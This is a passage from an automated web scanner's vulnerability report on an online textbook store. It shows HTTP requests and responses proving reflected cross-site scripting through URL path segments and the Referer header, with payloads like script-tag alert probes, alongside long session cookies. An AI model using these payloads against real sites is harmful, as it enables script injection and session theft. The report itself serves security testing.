8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js7dd3c';05d551d3562/s_code.js'

</script>
...[SNIP]...

1.88. https://www.textbooks.com/js/s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6a0'%3bbc6da8b4aa6 was submitted in the REST URL parameter 2. This input was echoed as 8e6a0';bc6da8b4aa6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/s_code.js8e6a0'%3bbc6da8b4aa6 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/s_code.js8e6a0';bc6da8b4aa6'

</script>
...[SNIP]...

1.89. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd482'%3b7286a6537af was submitted in the REST URL parameter 1. This input was echoed as fd482';7286a6537af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfd482'%3b7286a6537af/tbcart-ajax.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsfd482';7286a6537af/tbcart-ajax.js'

</script>
...[SNIP]...

1.90. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f90a4'%3b1ec79ba0ae1 was submitted in the REST URL parameter 2. This input was echoed as f90a4';1ec79ba0ae1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/tbcart-ajax.jsf90a4'%3b1ec79ba0ae1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/tbcart-ajax.jsf90a4';1ec79ba0ae1'

</script>
...[SNIP]...

1.91. https://www.textbooks.com/modcss.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /modcss.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3061b'%3bc453652cc98 was submitted in the REST URL parameter 1. This input was echoed as 3061b';c453652cc98 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modcss.php3061b'%3bc453652cc98 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:09 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/modcss.php3061b';c453652cc98'

</script>
...[SNIP]...

1.92. http://www.textbooks.com/Cart.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3205f'><script>alert(1)</script>0f100bc08b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;
Referer: http://www.google.com/search?hl=en&q=3205f'><script>alert(1)</script>0f100bc08b9

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Content-Length: 25454
Connection: close
Set-Cookie: TBSESSION=vS3CZTVN4V9T04BQLauyRjtj4X%2BrPBD%2B9PimBdwncVrIS3Luk1nHU9ZZbWxW330hfbihjJhimPIzFI3LK%2B4LoVnpXktxBSd9gHE5bXZs0JVchdxKbOBq8hbbUhnXxC3h%2FKfWIsgJoEDKlSGvwT%2B4GNz7rEGLFQyCztBJSb40wRYnBHMbcjyVNdu5jlPHfkqS15TJpzcmKYUzZhHHPcpmWaPwO66g0XL%2ByBZ0Dx9ILvAy09X8kC72INrVJNu%2F21zPmrfGOmUVlARk2FoOXhpOHBBl78l2SbMsFRZ6TEm8PysO9DxG0jPoD02Qnw1r1Yf9UGZ3rdCR79Ypy88DcAq%2B6XiLHUJAas2EL82n5LJ2gsbBdeXNLjn2644RrAz0CcM1mzAz2wamY6eFJxQAQpr1labZcuOGDkYzI4IlPH4tWytUv0BIf1Hx%2BxqDTAmMYIsw%2BTREyPFWPwP%2BX8%2FPZ3llaV4ecgOPZoQpZ5DnI9OSvTyLSjkcxoz%2F6wIUPtPonnLaOiqf2xPHkjKY1OmdmmgfjgU305xYtTmlwnd%2BzOQf1NxnSP6wM8EAF%2FhQ32B1VgcnTRlvhrPryCZjuNnEte%2BUJly11w9n%2B1SU0Jba8scXrbwn5BcTTIBjAihX5wLCWaNtYjq27pj4rDz7SdWe%2BnTu5oNdqbzKyDKgZz0UztP3YrFhc8pQxaiQra5y%2FWrcVCQpB6XtHYYpPw%2Fdg2fhYMsRAmIpMZWe3IqXh%2FzDftclggLuMApO%2BcX5mmXpNkP6ifZJ7Yreg%2F%2FmqDlmtjg4GlXgBZnH769Vgep3YoIBDHI4SDC1BIvP41ryzjgtE2m%2BJMqkr1REOTHAPlJ%2FMc1qsVLiH%2FKRQo9tW%2Bvm4MnJVP%2FjYXMAXY1JOUihBXWooj8ifB97iC0UzjjIositXymKhMFpIFAfG%2FloPCZnyLkWFf3XVaRngYmZeJc09eIt1PNYSm%2Bh2dgnmaYJPNe7ts%2BlD%2FtEon3Hw0B51fA8P3hE%2F509HgQfehaos%2Fd%2F9hJdnNVyOrtfNZDRTq%2BfGm2mqo1KyXrcrRYTLUNrmPYJ%2B%2F6cmtw6cMoNIlTI%2B6%2F%2BBnrOKbjMiFVM%2FrcqNWlmbNUF1Be%2BsAiRKeAUtqZibuniyrZPKhTjp1lKdklJHBi%2BvcWBItAqFa55jRTDKSUuw6F4p9MfA3N%2FOCdQDMKzBNLhB5V7VieTy70s%2BBI8YnbGqjupd%2FS8Ig3Z85G2x6iYKUhTJBUw9nX1GUUQu0ldeGOpwdBV5Xm5DrXvOAMrfgy%2BFIfLNzE%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=M%2F7AkKGVrp7Jrv9MNfg%3D; expires=Mon, 26-Dec-2011 13:52:09 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=3205f'><script>alert(1)</script>0f100bc08b9'>
...[SNIP]...

1.93. https://www.textbooks.com/checkout.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d67a'><script>alert(1)</script>0e18f25531c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
